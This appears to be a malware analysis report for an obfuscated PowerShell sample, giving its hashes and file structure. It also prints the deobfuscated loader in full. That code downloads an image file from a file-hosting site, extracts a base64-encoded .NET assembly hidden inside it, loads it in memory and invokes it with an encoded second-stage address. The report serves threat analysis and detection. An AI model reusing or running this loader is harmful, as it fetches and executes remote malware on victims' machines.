Malicious

2e6e2f37187fc0cf8ac73501b02a613b

PowerShell | MD5: 2e6e2f37187fc0cf8ac73501b02a613b | Size: 20.28 KB | application/x-powershell

PowerShell | Powershell: Hidden Execution | Contains Base64 Block | Base64 Block | DeObfuscated
Characteristics
Hash | Hash Value
MD5 | 2e6e2f37187fc0cf8ac73501b02a613b
Sha1 | 8931c4cba2ff3bd29281ee86ddb3f62772d63149
Sha256 | ace00c4aa0c763c44c1821d87307262587d88aa3446bbff35c8816eb4a340623
Sha384 | aa8dbd309ce349e28d635753681be50413bbe08495b85b8dad136cdc454df86fd5b589efdb0b83ae7358210d5c417f18
Sha512 | 0f7ebdeec48cdbdc0f4d0a26a7d8f4aaaad4833a233115cff5df2197e8b45619f9b653058a836fa4d1b9a094e672a6486d793e12322607928c407a14391ffe76
SSDeep | 384:pjtP2z+UZX6qkPmgAAGUQLiYtq3jgPoI74s/xz5+xpe2ibYWIDajrUmFyjF8Kbgg:pjR2z+UZXzkRAAGUQLiYw3j+rUmFyjFF
TLSH | 34920D4E5D03043289332F3E5F17544AEF6B052789298A40BFCCCAA5AFB565183B9F6D
File Structure
2e6e2f37187fc0cf8ac73501b02a613b | PowerShell | Powershell: Hidden Execution | Contains Base64 Block | Base64 Block | DeObfuscated | Malicious
[PowerShell Command] | PowerShell | DeObfuscated | Malicious
[Deobfuscated PS] | DeObfuscated | PowerShell | Malicious
[Base64-Block] | Base64 Block | PowerShell | DeObfuscated | Malicious
[Deobfuscated PS] | DeObfuscated | PowerShell | Malicious
Artefacts
Name: Deobfuscated PowerShell
Value:

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://files.catbox.moe/hejh36.jpg" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd")
$valor = $matches[1]
$assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor))
$olinia = "=kzNihjZxIDOxkzMy0yM5QGOtEDMzQTLlJ2M50SMzUDNzQzYm1jblt2b0ZSYpRWZt1DdsF2P0hHdukXe55Wa69ybvAHch5SZnFmcvR3clNXYiVmcpZmL2IzMkJWL0NWZq9mcw9iYvAjdv02bj5ycpBXYlx2Zv92ZuU2ZhJ3b0NXZzFmYlJXam9yL6MHc0RHa"
$type = $assembly."GetType"("ClassLibrary1.Home")
$method = $type."GetMethod"("VAI")
$method."Invoke"($null, [object[]] @({ @($olinia, "", "", "", "MSBuild", "", "", "", "", "C:\Users\Public\Downloads", "bifanged", "js", "", "", "lotong", "2", "") } ))

Characteristics
No malware configuration was found at this point.